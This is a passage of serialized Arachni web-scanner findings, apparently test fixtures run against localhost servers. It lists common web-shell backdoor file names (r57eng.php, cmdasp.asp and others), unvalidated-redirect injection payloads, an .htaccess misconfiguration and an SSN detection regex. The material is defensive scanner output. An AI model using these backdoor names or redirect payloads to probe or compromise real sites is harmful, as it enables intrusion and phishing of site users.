                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/nstview.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: nstview.php
    injected: nstview.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: nstview.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/nstview.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/nst.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: nst.php
    injected: nst.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: nst.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/nst.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/rst.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: rst.php
    injected: rst.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: rst.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/rst.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/r57eng.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: r57eng.php
    injected: r57eng.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: r57eng.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/r57eng.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/r.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: r.php
    injected: r.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: r.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/r.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/shell.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: shell.php
    injected: shell.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: shell.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/shell.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/lol.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: lol.php
    injected: lol.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: lol.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/lol.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/zehir.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: zehir.php
    injected: zehir.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: zehir.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/zehir.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/c-h.v2.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: c-h.v2.php
    injected: c-h.v2.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: c-h.v2.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/c-h.v2.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/php-backdoor.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "16"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: php-backdoor.php
    injected: php-backdoor.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: php-backdoor.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/php-backdoor.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/simple-backdoor.php
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "19"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: simple-backdoor.php
    injected: simple-backdoor.php
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: simple-backdoor.php
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/simple-backdoor.php
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
  elem: path
  internal_modname: Backdoors
  method: ""
  mod_name: Backdoors
  name: A backdoor file exists on the server.
  references: 
    Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
  remedy_guidance: |-
    Perform a source code and deployment audit to eliminate any
                        unwanted files/resources and lines of code. Preferably perform a fresh deployment.
  severity: High
  tags: 
  - path
  - backdoor
  - file
  - discovery
  url: http://localhost:12541/cmdasp.asp
  variations: 
  - !ruby/object:Arachni::Issue 
    description: " The server response indicates that a file matching\n    the name of a common backdoor is publicly accessible.\n    This indicates that the server has been compromised and can\n    (to some extent) be remotely controled by unauthorised users."
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cmdasp.asp
    injected: cmdasp.asp
    internal_modname: Backdoors
    method: ""
    mod_name: Backdoors
    name: A backdoor file exists on the server.
    opts: 
      :regexp: ""
    references: 
      Blackhat: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf
    remedy_guidance: |-
      Perform a source code and deployment audit to eliminate any
                          unwanted files/resources and lines of code. Preferably perform a fresh deployment.
    response: cmdasp.asp
    severity: High
    tags: 
    - path
    - backdoor
    - file
    - discovery
    url: http://localhost:12541/cmdasp.asp
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: The .htaccess file blocks GET requests but allows POST.
  elem: server
  internal_modname: Htaccess
  method: POST
  mod_name: .htaccess LIMIT misconfiguration
  name: Misconfiguration in LIMIT directive of .htaccess file.
  references: 
    Apache.org: http://httpd.apache.org/docs/2.2/mod/core.html#limit
  remedy_guidance: |-
    Do not use the LIMIT tag.
                        If you are in a situation where you want to allow specific request methods, you should use LimitExcept instead.
  severity: High
  tags: 
  - htaccess
  - server
  - limit
  url: http://localhost:6339/
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: The .htaccess file blocks GET requests but allows POST.
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: Htaccess
    method: POST
    mod_name: .htaccess LIMIT misconfiguration
    name: Misconfiguration in LIMIT directive of .htaccess file.
    opts: 
      :element: server
      :regexp: ""
    references: 
      Apache.org: http://httpd.apache.org/docs/2.2/mod/core.html#limit
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Do not use the LIMIT tag.
                          If you are in a situation where you want to allow specific request methods, you should use LimitExcept instead.
    response: ""
    severity: High
    tags: 
    - htaccess
    - server
    - limit
    url: http://localhost:6339/
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: A US Social Security Number is being disclosed.
  elem: body
  internal_modname: SSN
  method: GET
  mod_name: SSN
  name: Disclosed US Social Security Number.
  references: 
    ssa.gov: http://www.ssa.gov/pubs/10064.html
  remedy_guidance: Remove all SSN occurrences from the page.
  severity: High
  tags: []

  url: http://localhost:14187/
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: A US Social Security Number is being disclosed.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "19"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: SSN
    method: GET
    mod_name: SSN
    name: Disclosed US Social Security Number.
    opts: 
      :regexp: (?-mix:\b(((?!000)(?!666)(?:[0-6]\d{2}|7[0-2][0-9]|73[0-3]|7[5-6][0-9]|77[0-2]))-((?!00)\d{2})-((?!0000)\d{4}))\b)
      :match: 333-65-4320
      :element: body
    references: 
      ssa.gov: http://www.ssa.gov/pubs/10064.html
    regexp: (?-mix:\b(((?!000)(?!666)(?:[0-6]\d{2}|7[0-2][0-9]|73[0-3]|7[5-6][0-9]|77[0-2]))-((?!00)\d{2})-((?!0000)\d{4}))\b)
    regexp_match: 333-65-4320
    remedy_guidance: Remove all SSN occurrences from the page.
    response: stuff 333-65-4320 v
    severity: High
    tags: []

    url: http://localhost:14187/
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "819"
  cwe_url: http://cwe.mitre.org/data/definitions/819.html
  description: The web application redirects users to unvalidated URLs.
  elem: form
  internal_modname: UnvalidatedRedirect
  method: GET
  mod_name: UnvalidatedRedirect
  name: Unvalidated redirect
  references: 
    OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
  remedy_guidance: |-
    Server side verification should be employed
                        to ensure that the redirect destination is the one intended.
  severity: Medium
  tags: 
  - unvalidated
  - redirect
  - injection
  - header
  - location
  url: http://localhost:8976/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "819"
    cwe_url: http://cwe.mitre.org/data/definitions/819.html
    description: The web application redirects users to unvalidated URLs.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Location: http://www.arachni-boogie-woogie.com
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: !binary |
      d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A

    internal_modname: UnvalidatedRedirect
    method: GET
    mod_name: UnvalidatedRedirect
    name: Unvalidated redirect
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: www.arachni-boogie-woogie.com
      :altered: input
      :element: form
      :params: 
        input: !binary |
          d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A

      :follow_location: true
      :injected: !binary |
        d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A

      :combo: 
        input: !binary |
          d3d3LmFyYWNobmktYm9vZ2llLXdvb2dpZS5jb20A

      :action: http://localhost:8976/form/straight
      :regexp: ""
    references: 
      OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Server side verification should be employed
                          to ensure that the redirect destination is the one intended.
    response: ""
    severity: Medium
    tags: 
    - unvalidated
    - redirect
    - injection
    - header
    - location
    url: http://localhost:8976/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "819"
  cwe_url: http://cwe.mitre.org/data/definitions/819.html
  description: The web application redirects users to unvalidated URLs.
  elem: form
  internal_modname: UnvalidatedRedirect
  method: GET
  mod_name: UnvalidatedRedirect
  name: Unvalidated redirect
  references: 
    OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
  remedy_guidance: |-
    Server side verification should be employed
                        to ensure that the redirect destination is the one intended.
  severity: Medium
  tags: 
  - unvalidated
  - redirect
  - injection
  - header
  - location
  url: http://localhost:8976/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "819"
    cwe_url: http://cwe.mitre.org/data/definitions/819.html
    description: The web application redirects users to unvalidated URLs.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Location: http://www.arachni-boogie-woogie.com
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: defaultwww.arachni-boogie-woogie.com
    internal_modname: UnvalidatedRedirect
    method: GET
    mod_name: UnvalidatedRedirect
    name: Unvalidated redirect
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :injected_orig: www.arachni-boogie-woogie.com
      :altered: input
      :element: form
      :params: 
        input: defaultwww.arachni-boogie-woogie.com
      :follow_location: true
      :injected: defaultwww.arachni-boogie-woogie.com
      :combo: 
        input: defaultwww.arachni-boogie-woogie.com
      :action: http://localhost:8976/form/append
      :regexp: ""
    references: 
      OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      Server side verification should be employed
                          to ensure that the redirect destination is the one intended.
    response: ""
    severity: Medium
    tags: 
    - unvalidated
    - redirect
    - injection
    - header
    - location
    url: http://localhost:8976/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "819"
  cwe_url: http://cwe.mitre.org/data/definitions/819.html
  description: The web application redirects users to unvalidated URLs.
  elem: link
  internal_modname: UnvalidatedRedirect
  method: GET
  mod_name: UnvalidatedRedirect
  name: Unvalidated redirect
  references: 
    OWASP Top 10 2010: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
  remedy_guidance: |-
    Server side verification should be employed
                        to ensure that the redirect destination is the one intended.
  severity: Medium
  tags: 
  - unvalidated
  - redirect
  - injection
  - header
  - location
  url: http://localhost:8976/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "819"
    cwe_url: http://cwe.mitre.org/data/definitions/819.html
    description: The web application redirects users to unvalidated URLs.
    elem: link
    headers: 
      request: 
